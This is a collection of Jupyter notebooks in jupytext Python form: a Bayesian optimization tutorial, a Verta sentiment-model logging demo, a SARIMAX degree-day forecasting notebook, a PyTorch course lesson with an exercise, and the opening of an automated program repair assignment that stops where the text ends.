# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
from bayes_opt import BayesianOptimization
from bayes_opt import UtilityFunction
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
# %matplotlib inline
# -
# # Target Function
#
# Let's create a 1-D target function with multiple local maxima to test and visualize how the [BayesianOptimization](https://github.com/fmfn/BayesianOptimization) package works. The target function we will try to maximize is the following:
#
# $$f(x) = e^{-(x - 2)^2} + e^{-\frac{(x - 6)^2}{10}} + \frac{1}{x^2 + 1}, $$ its maximum is at $x = 2$ and we will restrict the interval of interest to $x \in (-2, 10)$.
#
# Notice that, in practice, this function is unknown; the only information we have is obtained by sequentially probing it at different points. Bayesian optimization works by constructing a posterior distribution over functions that best fits the observed data and choosing the next probing point by balancing exploration and exploitation.
def target(x):
    return np.exp(-(x - 2)**2) + np.exp(-(x - 6)**2/10) + 1/(x**2 + 1)
# +
x = np.linspace(-2, 10, 10000).reshape(-1, 1)
y = target(x)
plt.plot(x, y);
# -
# # Create a BayesianOptimization Object
#
# Enter the target function to be maximized, its variable(s), and their corresponding ranges. A minimum of 2 initial guesses is necessary to kick-start the algorithm; these can be either random or user-defined.
optimizer = BayesianOptimization(target, {'x': (-2, 10)}, random_state=27)
# In this example we will use the Upper Confidence Bound (UCB) as our utility function. It has the free parameter
# $\kappa$ which controls the balance between exploration and exploitation; we will set $\kappa=5$ which, in this case, makes the algorithm quite bold.
optimizer.maximize(init_points=2, n_iter=0, kappa=5)
# # Plotting and visualizing the algorithm at each step
# ### Let's first define a couple functions to make plotting easier
# +
def posterior(optimizer, x_obs, y_obs, grid):
    optimizer._gp.fit(x_obs, y_obs)
    mu, sigma = optimizer._gp.predict(grid, return_std=True)
    return mu, sigma
def plot_gp(optimizer, x, y):
    fig = plt.figure(figsize=(16, 10))
    steps = len(optimizer.space)
    fig.suptitle(
        'Gaussian Process and Utility Function After {} Steps'.format(steps),
        fontdict={'size': 30}
    )
    gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
    axis = plt.subplot(gs[0])
    acq = plt.subplot(gs[1])
    x_obs = np.array([[res["params"]["x"]] for res in optimizer.res])
    y_obs = np.array([res["target"] for res in optimizer.res])
    mu, sigma = posterior(optimizer, x_obs, y_obs, x)
    axis.plot(x, y, linewidth=3, label='Target')
    axis.plot(x_obs.flatten(), y_obs, 'D', markersize=8, label=u'Observations', color='r')
    axis.plot(x, mu, '--', color='k', label='Prediction')
    axis.fill(np.concatenate([x, x[::-1]]),
              np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]]),
              alpha=.6, fc='c', ec='None', label='95% confidence interval')
    axis.set_xlim((-2, 10))
    axis.set_ylim((None, None))
    axis.set_ylabel('f(x)', fontdict={'size': 20})
    axis.set_xlabel('x', fontdict={'size': 20})
    utility_function = UtilityFunction(kind="ucb", kappa=5, xi=0)
    utility = utility_function.utility(x, optimizer._gp, 0)
    acq.plot(x, utility, label='Utility Function', color='purple')
    acq.plot(x[np.argmax(utility)], np.max(utility), '*', markersize=15,
             label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
    acq.set_xlim((-2, 10))
    acq.set_ylim((0, np.max(utility) + 0.5))
    acq.set_ylabel('Utility', fontdict={'size': 20})
    acq.set_xlabel('x', fontdict={'size': 20})
    axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
    acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
# -
# ### Two random points
#
# After we probe two points at random, we can fit a Gaussian process and start the Bayesian optimization procedure. Two points should give us an uneventful posterior, with the uncertainty growing as we move further from the observations.
plot_gp(optimizer, x, y)
# ### After one step of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After two steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After three steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After four steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After five steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After six steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# ### After seven steps of GP (and two random points)
optimizer.maximize(init_points=0, n_iter=1, kappa=5)
plot_gp(optimizer, x, y)
# # Stopping
#
# After just a few points the algorithm was able to get pretty close to the true maximum. It is important to notice that the trade-off between exploration (exploring the parameter space) and exploitation (probing points near the current known maximum) is fundamental to a successful Bayesian optimization procedure. The utility function used here (Upper Confidence Bound - UCB) has a free parameter $\kappa$ that allows the user to make the algorithm more or less conservative. Additionally, the larger the initial set of random points explored, the less likely the algorithm is to get stuck in a local maximum due to being too conservative.
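# As an aside, the UCB acquisition value used throughout is simply the posterior mean plus $\kappa$ posterior standard deviations at each candidate point; a minimal sketch with illustrative numbers (not values taken from the run above):

```python
def ucb(mu, sigma, kappa):
    """Upper Confidence Bound: posterior mean plus kappa times the
    posterior standard deviation. Larger kappa favours exploration."""
    return mu + kappa * sigma

# The same posterior point scored with different kappa values:
cautious = ucb(0.8, 0.3, kappa=1)  # 1.1 -- dominated by the mean (exploitation)
bold = ucb(0.8, 0.3, kappa=5)      # 2.3 -- dominated by the uncertainty (exploration)
```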
# Source: visualization.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <a href="https://colab.research.google.com/github/VertaAI/modeldb/blob/master/client/workflows/demos/distilbert-sentiment-classification.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
import os
os.environ['VERTA_HOST'] = ""     # fill in your Verta host URL
os.environ['VERTA_EMAIL'] = ""    # fill in your account email
os.environ['VERTA_DEV_KEY'] = ""  # fill in your developer key
# !pip install verta torch transformers
# # Models
from transformers import (
pipeline,
AutoModelForSequenceClassification,
AutoTokenizer,
)
# +
class Model:
    MODEL = None

    def __init__(self):
        self.model = pipeline(
            task="sentiment-analysis",
            model=AutoModelForSequenceClassification.from_pretrained(self.MODEL),
            tokenizer=AutoTokenizer.from_pretrained(self.MODEL),
        )

    def predict(self, text):
        return self.model(text)[0]


class DistilBERT(Model):
    MODEL = "distilbert-base-uncased-finetuned-sst-2-english"

    def predict(self, text):
        sentiment = super(DistilBERT, self).predict(text)
        return sentiment


class MultilingualBERT(Model):
    MODEL = "nlptown/bert-base-multilingual-uncased-sentiment"

    def __init__(self):
        super(MultilingualBERT, self).__init__()
        self.model.return_all_scores = True  # this model has 5 categories, and we'll need to make it 2

    def predict(self, text):
        scores = super(MultilingualBERT, self).predict(text)
        scores = sorted(scores, key=lambda score: score['score'], reverse=True)
        sentiment = scores[0]
        # fix label
        if sentiment['label'].startswith(('1', '2', '3')):
            sentiment['label'] = "NEGATIVE"
        else:  # ('4', '5')
            sentiment['label'] = "POSITIVE"
        # aggregate score
        sentiment['score'] = sum(score['score'] for score in scores[:3])
        return sentiment


class BERT(Model):
    MODEL = "textattack/bert-base-uncased-imdb"

    def predict(self, text):
        sentiment = super(BERT, self).predict(text)
        # fix label
        if sentiment['label'] == "LABEL_0":
            sentiment['label'] = "NEGATIVE"
        else:  # "LABEL_1"
            sentiment['label'] = "POSITIVE"
        return sentiment


class GermanBERT(Model):
    MODEL = "oliverguhr/german-sentiment-bert"

    def predict(self, text):
        sentiment = super(GermanBERT, self).predict(text)
        # fix label
        sentiment['label'] = sentiment['label'].upper()
        return sentiment
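# The five-star-to-binary mapping used by `MultilingualBERT` can be isolated into a small helper; a sketch of the same rule (assuming labels of the form '1 star' … '5 stars'):

```python
def collapse_stars(label):
    """Map a five-level star-rating label onto binary sentiment:
    1-3 stars count as NEGATIVE, 4-5 stars as POSITIVE."""
    return "NEGATIVE" if label.startswith(('1', '2', '3')) else "POSITIVE"

collapse_stars("2 stars")  # 'NEGATIVE'
collapse_stars("5 stars")  # 'POSITIVE'
```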
# +
distilbert = DistilBERT()
multilingual_bert = MultilingualBERT()
bert = BERT()
german_bert = GermanBERT()
print(distilbert.predict("I like you"))
print(multilingual_bert.predict("I like you"))
print(bert.predict("I like you"))
print(german_bert.predict("I like you"))
# -
# # Logging Runs
# +
from verta import Client
client = Client()
# -
client.create_project(
"Text Classification",
desc="Models trained for textual sentiment classification.",
tags=["NLP", "Classification", "Q4"],
attrs={'team': "Verta"},
)
# +
client.create_experiment("DistilBERT", tags=["Neural Net"])
run = client.create_experiment_run(
"First DistilBERT",
tags=["DistilBERT", "English"],
)
run.log_model(distilbert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
# +
client.create_experiment("BERT", tags=["Neural Net"])
run = client.create_experiment_run(
"First BERT",
tags=["BERT", "English"],
)
run.log_model(bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
run = client.create_experiment_run(
"Multilingual",
tags=["BERT", "English", "German"],
)
run.log_model(multilingual_bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
run = client.create_experiment_run(
"German",
tags=["BERT", "German"],
)
run.log_model(german_bert, custom_modules=[])
run.log_requirements(["torch", "transformers"])
# -
# ---
# Source: client/workflows/demos/distilbert-sentiment-classification.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from pandas.tseries.offsets import BDay
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
import sklearn as sk
import seaborn as sns
import statsmodels.api as sm
import statsmodels.formula.api as smf
import statsmodels.tsa.api as smt
import itertools
import warnings
import scipy.signal as sp
import math
from statsmodels.tsa.stattools import acf, pacf
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
import datetime
import statistics
from sklearn import linear_model
# +
#build baseline equation
total = pd.concat([demand2016])
total = pd.merge(total,temp,how='inner', left_index=True, right_index=True)
X1 = total.drop(['Total','Toronto'],axis = 1)
Y = total['Total']
clf = linear_model.Lasso(alpha = 0.1) #.LinearRegression()
clf.fit(X1, Y)
print(clf.score(X1,Y))
baseline = clf.coef_[0]*temp['CDD'] + clf.coef_[1]*temp['HDD'] + clf.intercept_  # one coefficient per regressor
plt.plot(demand2017['2017'])
plt.plot(baseline['2017'])
# -
def convert_datetime(dTot):
    dTot['Date_Hour'] = pd.to_datetime(dTot.Date) + pd.to_timedelta(dTot.Hour, unit='h')
    dTot = dTot.drop(['Date','Hour'], axis=1)
    dTot = dTot.set_index('Date_Hour')
    return dTot
# +
#weather normalize data
#importing weather data
temp = pd.read_csv("temperature.csv", usecols = [0,26], parse_dates=["datetime"], index_col="datetime")
#convert to degrees celsius
temp = temp - 273.15
#calculate HDD/CDD
talpha = 14 #temp where correlation between temperature and demand inverts
tbeta = 14
temp['CDD'] = (((temp['Toronto'].resample('D').max()+temp['Toronto'].resample('D').min())/2-talpha))
temp['HDD'] = ((tbeta-(temp['Toronto'].resample('D').max()+temp['Toronto'].resample('D').min())/2))
temp.loc[temp.CDD < 0, 'CDD'] = 0
temp.loc[temp.HDD < 0, 'HDD'] = 0
print(temp['2012-10-02':].resample('D').mean())
# -
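# The degree-day computation above reduces to a simple per-day rule; a minimal sketch using the same 14 °C balance point (plain floats instead of the resampled series):

```python
def degree_days(t_max, t_min, base=14.0):
    """Cooling and heating degree days for one day, from the daily max and
    min temperature in Celsius: only the positive part of the difference
    between the daily mean and the balance point counts."""
    t_mean = (t_max + t_min) / 2
    cdd = max(0.0, t_mean - base)
    hdd = max(0.0, base - t_mean)
    return cdd, hdd

degree_days(30, 20)  # hot day: (11.0, 0.0)
degree_days(0, -10)  # cold day: (0.0, 19.0)
```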
#1 day ahead
forecast_length = 1
print(len(demand2017))
def test_model(train, test, i):
    #convert by log
    #print(train[i])
    #print(test[i])
    #dTot_train_log = np.log(train[i]) # change
    #seasonal differencing
    seasons = 12
    #dTot_train_log_ewma = dTot_train_log - dTot_train_log.shift(seasons)
    #fit model
    mod = sm.tsa.statespace.SARIMAX(train[i],
                                    order=(1, 1, 0),
                                    seasonal_order=(0, 0, 0, seasons),
                                    enforce_stationarity=False,
                                    enforce_invertibility=False)
    results = mod.fit()
    #forecast
    forecast = pd.Series(results.get_forecast(steps=forecast_length).predicted_mean, copy=True)
    #forecast_log_diff = pd.Series(results.get_forecast(steps = forecast_length).predicted_mean, copy = True)
    #forecast_log_diff.index = test[i].index #.resample('D').mean()
    #Remove differencing
    #forecast_log = forecast_log_diff + dTot_train_log.shift(seasons).iloc[len(train[i])-1] #try mean?
    #Remove log
    #forecast = pd.Series(np.exp(forecast_log), index=forecast_log.index)
    #print(forecast)
    #plt.plot(forecast)
    #plt.plot(test[i])
    #print(test[i])
    #plt.legend(['Forecast','Test'])
    #AIC = results.aic
    #RMSE = (forecast - test[i].Total).abs()
    #RMSE = math.sqrt((((forecast - test[i].Total)**2).mean()))
    #print('AIC:')
    #print(AIC)
    #print('RMSE:')
    #print(RMSE)
    #plt.plot(dTot_train_log_ewma)
    #Plot auto and partial correlation
    #fig = plt.figure(figsize=(12,8))
    #ax1 = fig.add_subplot()
    #fig = sm.graphics.tsa.plot_acf(dTot_train_log_ewma, lags=40, ax=ax1)
    #ax2 = fig.add_subplot()
    #fig = sm.graphics.tsa.plot_pacf(dTot_train_log_ewma, lags=40, ax=ax2)
    return forecast
# +
#Split into train/test
train = []
test = []
results = []
start = 0 #if 1 delete append 2017 in train, remember to change for loop length i.e 260 if 1
ctr = start+forecast_length #forecast_length
train.append(temp['2012-10-02':'2016-12-31'].CDD.resample('D').mean()) #,demand2017.iloc[0:130] summer only
test.append(temp['2017':].CDD.resample('D').mean().iloc[[start]]) #[0:forecast_length]
results.append(test_model(train,test,0))
#int(round(260/forecast_length))
for i in range(1,334): #(1,260) summer only
    train.append(train[i-1].append(test[i-1]))
    test.append(temp['2017':].CDD.resample('D').mean().iloc[[ctr]])
    ctr = ctr + forecast_length
    results.append(test_model(train,test,i))
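# The expanding-window loop above follows a standard walk-forward pattern; a minimal sketch with a naive last-value forecaster standing in for the SARIMAX model (the forecaster is a placeholder, not the model used here):

```python
def walk_forward(series, n_train, forecast):
    """Expanding-window one-step-ahead evaluation: forecast the next point
    from all data seen so far, then fold the actual value into training."""
    train = list(series[:n_train])
    predictions = []
    for actual in series[n_train:]:
        predictions.append(forecast(train))  # predict the next value
        train.append(actual)                 # expand the training window
    return predictions

naive = lambda history: history[-1]  # last observed value as the forecast
walk_forward([1, 2, 3, 4, 5], n_train=2, forecast=naive)  # [2, 3, 4]
```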
# +
error = []
for i in range(0,334):
    error.append((test[i] - results[i]).abs())
r1 = 1
r2 = 364
plt.ylabel('CDD (Celsius)')
plt.xlabel('Day of Year')
plt.title('SARIMA vs. Actual Weather Daily CDD 2017')
plt.plot(results[r1:r2])
plt.plot(test[r1:r2])
plt.legend(['Forecast - 2017','Actual - 2017'])
from sklearn.metrics import mean_squared_error
from math import sqrt
rms = sqrt(mean_squared_error(test[r1:r2], results[r1:r2]))
print(rms)
print(np.mean(error[r1:r2]))
#print(error)
# -
pd.concat(results).to_csv('SARIMAX_CDD_Forecast')
# Source: SARIMAX_CDD.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# $\newcommand{\xbf}{{\bf x}}
# \newcommand{\ybf}{{\bf y}}
# \newcommand{\wbf}{{\bf w}}
# \newcommand{\Ibf}{\mathbf{I}}
# \newcommand{\Xbf}{\mathbf{X}}
# \newcommand{\Rbb}{\mathbb{R}}
# \newcommand{\vec}[1]{\left[\begin{array}{c}#1\end{array}\right]}
# $
#
# # Introduction to the PyTorch Library -- Part 2
# Course material written by <NAME>, 2019
# ************
# %matplotlib inline
from matplotlib import pyplot as plt
import numpy as np
import aidecours
# ## The `torch.nn` module
import torch
torch.__version__ # This notebook was designed with version '1.2.0' of pytorch
# The `nn` module of the `torch` library contains several tools for building neural network architectures.
from torch import nn
# Let us revisit the least-squares example from the previous part in order to show how to express the problem as a neural network using the tools that *pyTorch* offers.
# #### Preparing the data
# Let us prepare the training data as *pyTorch tensors*.
# +
x = np.array([(1,1),(0,-1),(2,.5)])
y = np.array([-1., 3, 2])
x_tensor = torch.tensor(x, dtype=torch.float32)
y_tensor = torch.tensor(y, dtype=torch.float32)
# -
x_tensor
y_tensor
y_tensor = y_tensor.unsqueeze(1) # The torch.nn methods are designed to operate on matrices
y_tensor
# #### Linear layer
#
# The `Linear` class corresponds to a linear *layer*. The least-squares method only requires a single output neuron.
# +
# nn.Linear?
# -
neurone = nn.Linear(2, 1, bias=False)
neurone
neurone.weight
neurone(x_tensor)
# #### Loss function
# +
# nn.MSELoss?
# -
perte_quadratique = nn.MSELoss()
perte_quadratique(neurone(x_tensor), y_tensor)
# ## The optimization module `torch.optim`
# +
# torch.optim.SGD?
# +
eta = 0.4
alpha = 0.1
neurone = nn.Linear(2, 1, bias=False)
optimiseur = torch.optim.SGD(neurone.parameters(), lr=eta, momentum=alpha)
for t in range(20):
    y_pred = neurone(x_tensor)                 # Compute the neuron's output
    loss = perte_quadratique(y_pred, y_tensor) # Compute the loss function
    loss.backward()                            # Compute the gradients
    optimiseur.step()                          # Take one gradient descent step
    optimiseur.zero_grad()                     # Reset the gradient variables to zero
    print(t, loss.item())
# -
# Let us put all of this together to rewrite the `moindres_carres` module with the *pyTorch* tools.
class moindres_carres:
    def __init__(self, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
        # Initialize the gradient descent parameters
        self.eta = eta          # Step size
        self.alpha = alpha      # Momentum
        self.nb_iter = nb_iter  # Number of iterations
        self.seed = seed        # Random number generator seed
        # Initialize the lists recording the algorithm's trace
        self.w_list = list()
        self.obj_list = list()

    def _trace(self, w, obj):
        self.w_list.append(np.array(w.squeeze().detach()))
        self.obj_list.append(obj.item())

    def apprentissage(self, x, y):
        if self.seed is not None:
            torch.manual_seed(self.seed)
        x = torch.tensor(x, dtype=torch.float32)
        y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
        n, d = x.shape
        self.neurone = nn.Linear(d, 1, bias=False)
        perte_quadratique = nn.MSELoss()
        optimiseur = torch.optim.SGD(self.neurone.parameters(), lr=self.eta, momentum=self.alpha)
        for t in range(self.nb_iter + 1):
            y_pred = self.neurone(x)
            perte = perte_quadratique(y_pred, y)
            self._trace(self.neurone.weight, perte)
            if t < self.nb_iter:
                perte.backward()
                optimiseur.step()
                optimiseur.zero_grad()

    def prediction(self, x):
        x = torch.tensor(x, dtype=torch.float32)
        with torch.no_grad():
            pred = self.neurone(x)
        return pred.squeeze().numpy()
# +
eta = 0.4       # step size
alpha = 0.0     # momentum
nb_iter = 20    # number of iterations
algo = moindres_carres(eta, alpha, nb_iter, seed=None)
algo.apprentissage(x, y)
# -
algo.prediction(x)
w_opt = np.linalg.inv(x.T @ x) @ x.T @ y
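# The line above is the closed-form least-squares solution, i.e. the minimizer of the empirical quadratic loss (assuming $\Xbf^\top \Xbf$ is invertible):
#
# $$\wbf^* = \left(\Xbf^\top \Xbf\right)^{-1} \Xbf^\top \ybf$$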
fig, axes = plt.subplots(1, 2, figsize=(14.5, 4))
fonction_objectif = lambda w: np.mean((x @ w - y) ** 2)
aidecours.show_2d_trajectory(algo.w_list, fonction_objectif, ax=axes[0])
aidecours.show_learning_curve(algo.obj_list, ax=axes[1], obj_opt=fonction_objectif(w_opt))
# ## Adding a hidden layer
couche_cachee = nn.Linear(2, 4)
couche_cachee
couche_cachee.weight
couche_cachee.bias
for variables in couche_cachee.parameters():
    print(variables)
    print('---')
couche_cachee(x_tensor)
# #### Activation functions
# The *ReLU* activation function
# +
# nn.ReLU?
# -
activation_relu = nn.ReLU()
a = torch.linspace(-2, 2, 5)
a
activation_relu(a)
activation_relu(couche_cachee(x_tensor))
# The *tanh* activation function
# +
# nn.Tanh?
# -
activation_tanh = nn.Tanh()
activation_tanh(a)
activation_tanh(couche_cachee(x_tensor))
# The *sigmoid* activation function
# +
# nn.Sigmoid?
# -
activation_sigmoide = nn.Sigmoid()
activation_sigmoide(a)
activation_sigmoide(couche_cachee(x_tensor))
# #### Stacking layers and activation functions
# +
# nn.Sequential?
# -
model = nn.Sequential(
torch.nn.Linear(2, 4),
torch.nn.ReLU(),
)
model(x_tensor)
model = nn.Sequential(
torch.nn.Linear(2, 4),
torch.nn.ReLU(),
torch.nn.Linear(4, 1),
)
model(x_tensor)
for variables in model.parameters():
    print(variables)
    print('---')
# ## A neural network with one hidden layer
class reseau_regression:
    def __init__(self, nb_neurones=4, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
        # Network architecture
        self.nb_neurones = nb_neurones  # Number of neurons in the hidden layer
        # Initialize the gradient descent parameters
        self.eta = eta          # Step size
        self.alpha = alpha      # Momentum
        self.nb_iter = nb_iter  # Number of iterations
        self.seed = seed        # Random number generator seed
        # Initialize the lists recording the algorithm's trace
        self.w_list = list()
        self.obj_list = list()

    def _trace(self, obj):
        self.obj_list.append(obj.item())

    def apprentissage(self, x, y):
        if self.seed is not None:
            torch.manual_seed(self.seed)
        x = torch.tensor(x, dtype=torch.float32)
        y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
        n, d = x.shape
        self.model = nn.Sequential(
            torch.nn.Linear(d, self.nb_neurones),
            torch.nn.ReLU(),
            torch.nn.Linear(self.nb_neurones, 1)
        )
        perte_quadratique = nn.MSELoss()
        optimiseur = torch.optim.SGD(self.model.parameters(), lr=self.eta, momentum=self.alpha)
        for t in range(self.nb_iter + 1):
            y_pred = self.model(x)
            perte = perte_quadratique(y_pred, y)
            self._trace(perte)
            if t < self.nb_iter:
                perte.backward()
                optimiseur.step()
                optimiseur.zero_grad()

    def prediction(self, x):
        x = torch.tensor(x, dtype=torch.float32)
        with torch.no_grad():
            pred = self.model(x)
        return pred.squeeze().numpy()
# +
nb_neurones = 4
eta = 0.1       # step size
alpha = 0.1     # momentum
nb_iter = 50    # number of iterations
x = np.array([(1,1),(0,-1),(2,.5)])
y = np.array([-1., 3, 2])
algo = reseau_regression(nb_neurones, eta, alpha, nb_iter, seed=None)
algo.apprentissage(x, y)
aidecours.show_learning_curve(algo.obj_list)
predictions = algo.prediction(x)
print('y =', y)
print('R(x) =', predictions)
# -
# ## Exercise
# The goal of this exercise is to adapt the `reseau_regression` class presented above to solve the following *classification* problem.
#
from sklearn.datasets import make_circles
xx, yy = make_circles(n_samples=100, noise=.1, factor=0.2, random_state=10)
aidecours.show_2d_dataset(xx, yy)
# We ask you to complete the `apprentissage` function of the `reseau_classification` class below. We advise you to draw inspiration from logistic regression, using a *sigmoid* activation function at the output together with the **negative log-likelihood** loss. It is not necessary to add a regularization term to the network.
#
# **Note**: the **negative log-likelihood** loss seen in class corresponds to the `nn.BCELoss` class
class reseau_classification:
    def __init__(self, nb_neurones=4, eta=0.4, alpha=0.1, nb_iter=50, seed=None):
        # Network architecture
        self.nb_neurones = nb_neurones  # Number of neurons in the hidden layer
        # Initialize the gradient descent parameters
        self.eta = eta          # Step size
        self.alpha = alpha      # Momentum
        self.nb_iter = nb_iter  # Number of iterations
        self.seed = seed        # Random number generator seed
        # Initialize the lists recording the algorithm's trace
        self.w_list = list()
        self.obj_list = list()

    def _trace(self, obj):
        self.obj_list.append(obj.item())

    def apprentissage(self, x, y):
        if self.seed is not None:
            torch.manual_seed(self.seed)
        x = torch.tensor(x, dtype=torch.float32)
        y = torch.tensor(y, dtype=torch.float32).unsqueeze(1)
        n, d = x.shape
        self.model = nn.Sequential(
            torch.nn.Linear(d, self.nb_neurones),
            # Complete the architecture here
        )
        perte_logistique = nn.BCELoss()
        optimiseur = torch.optim.SGD(self.model.parameters(), lr=self.eta, momentum=self.alpha)
        for t in range(self.nb_iter + 1):
            pass  # Complete the training loop here

    def prediction(self, x):
        x = torch.tensor(x, dtype=torch.float32)
        with torch.no_grad():
            pred = self.model(x)
        pred = pred.squeeze()
        return np.array(pred > .5, dtype=int)
# Run the following code to test your network. Vary the parameters to measure their influence.
# +
nb_neurones = 10
eta = 0.6       # step size
alpha = 0.4     # momentum
nb_iter = 50    # number of iterations
algo = reseau_classification(nb_neurones, eta, alpha, nb_iter)
algo.apprentissage(xx, yy)
fig, axes = plt.subplots(1, 2, figsize=(12, 4))
aidecours.show_learning_curve(algo.obj_list, ax=axes[0])
aidecours.show_2d_predictions(xx, yy, algo.prediction, ax=axes[1]);
# -
# Finally, we suggest exploring the network's behaviour by:
# 1. Replacing the *ReLU* activation function with a *tanh* activation function
# 2. Adding one or more extra hidden layers
# Source: td_semaine_2/Intro a pyTorch - Partie 2.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "slide"}
# # Third Project - Automated Repair
# + [markdown] slideshow={"slide_type": "slide"}
# ## Overview
# + [markdown] slideshow={"slide_type": "subslide"}
# ### The Task
#
# For the first two submissions we asked you to implement a _Debugger_ as well as an _Input Reducer_. Both of these tools are used to help the developer to locate bugs and then manually fix them.
#
# In this project, you will implement a technique of automatic code repair. To do so, you will extend the `Repairer` introduced in the [Repairing Code Automatically](https://www.debuggingbook.org/beta/html/Repairer.html) chapter of [The Debugging Book](https://www.debuggingbook.org/beta).
#
# Your own `Repairer` should automatically generate _repair suggestions_ for the faulty functions we provide later in this notebook. This can be achieved, for instance, by changing various components of the mutator, changing the debugger, or changing the reduction algorithm. However, you are neither required to make all of these changes nor required to limit yourself to the changes proposed here.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### The Submission
#
# The time frame for this project is **3 weeks**, and the deadline is **February 5th, 23:59**.
#
# The submission should be in the form of a Jupyter notebook, and you are expected to hand it in as a .zip archive. The notebook should, apart from the code itself, also provide sufficient explanations and reasoning (in markdown cells) behind the decisions that led to the solution provided. Projects that do not include explanations cannot get more than **15 points**.
# + slideshow={"slide_type": "skip"}
import bookutils
# + [markdown] slideshow={"slide_type": "slide"}
# ## A Faulty Function and How to Repair It
# Before discussing how to use and extend the Repairer, we first start by introducing a new (and highly complex) function that is supposed to return the larger of two values.
# + slideshow={"slide_type": "fragment"}
def larger(x, y):
    if x < y:
        return x
    return y
# + [markdown] slideshow={"slide_type": "fragment"}
# Unfortunately, we introduced a bug which makes the function behave in exactly the opposite way from how it is supposed to:
# + slideshow={"slide_type": "fragment"}
larger(1, 3)
# + [markdown] slideshow={"slide_type": "subslide"}
# To fix this issue, we could try to debug it, using the tools we have already seen. However, given the complexity of the function under test (sorry for the irony), we might want to automatically repair the function, using the *Repairer* introduced in *The Debugging Book*.
#
# To do so, we first need to define a set of test cases, which help the *Repairer* fix the function.
# + slideshow={"slide_type": "fragment"}
def larger_testcase():
    x = random.randrange(100)
    y = random.randrange(100)
    return x, y
# + slideshow={"slide_type": "fragment"}
def larger_test(x, y):
    m = larger(x, y)
    assert m == max(x, y), f"expected {max(x, y)}, but got {m}"
# + slideshow={"slide_type": "skip"}
import math
import random
# + slideshow={"slide_type": "subslide"}
random.seed(42)
# + [markdown] slideshow={"slide_type": "fragment"}
# Let us generate a random test case for our function:
# + slideshow={"slide_type": "fragment"}
larger_input = larger_testcase()
print(larger_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# and then feed it into our `larger_test()`:
# + slideshow={"slide_type": "skip"}
from ExpectError import ExpectError
# + slideshow={"slide_type": "subslide"}
with ExpectError():
larger_test(*larger_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# As expected, we got an error – the `larger()` function has a defect.
# + [markdown] slideshow={"slide_type": "fragment"}
# For a complete test suite, we need a set of passing and failing tests. To be sure we have both, we create functions which produce dedicated inputs:
# + slideshow={"slide_type": "subslide"}
def larger_passing_testcase():
    while True:
        try:
            x, y = larger_testcase()
            _ = larger_test(x, y)
            return x, y
        except AssertionError:
            pass
# + slideshow={"slide_type": "fragment"}
def larger_failing_testcase():
    while True:
        try:
            x, y = larger_testcase()
            _ = larger_test(x, y)
        except AssertionError:
            return x, y
# + slideshow={"slide_type": "subslide"}
passing_input = larger_passing_testcase()
print(passing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# With `passing_input`, our `larger()` function produces a correct result, and its test function does not fail.
# + slideshow={"slide_type": "fragment"}
larger_test(*passing_input)
# + slideshow={"slide_type": "fragment"}
failing_input = larger_failing_testcase()
print(failing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# While `failing_input` leads to an error:
# + slideshow={"slide_type": "subslide"}
with ExpectError():
larger_test(*failing_input)
# + [markdown] slideshow={"slide_type": "fragment"}
# With the above defined functions, we can now start to create a number of passing and failing tests:
# + slideshow={"slide_type": "fragment"}
TESTS = 100
# + slideshow={"slide_type": "fragment"}
LARGER_PASSING_TESTCASES = [larger_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "subslide"}
LARGER_FAILING_TESTCASES = [larger_failing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "skip"}
from StatisticalDebugger import OchiaiDebugger
# + [markdown] slideshow={"slide_type": "fragment"}
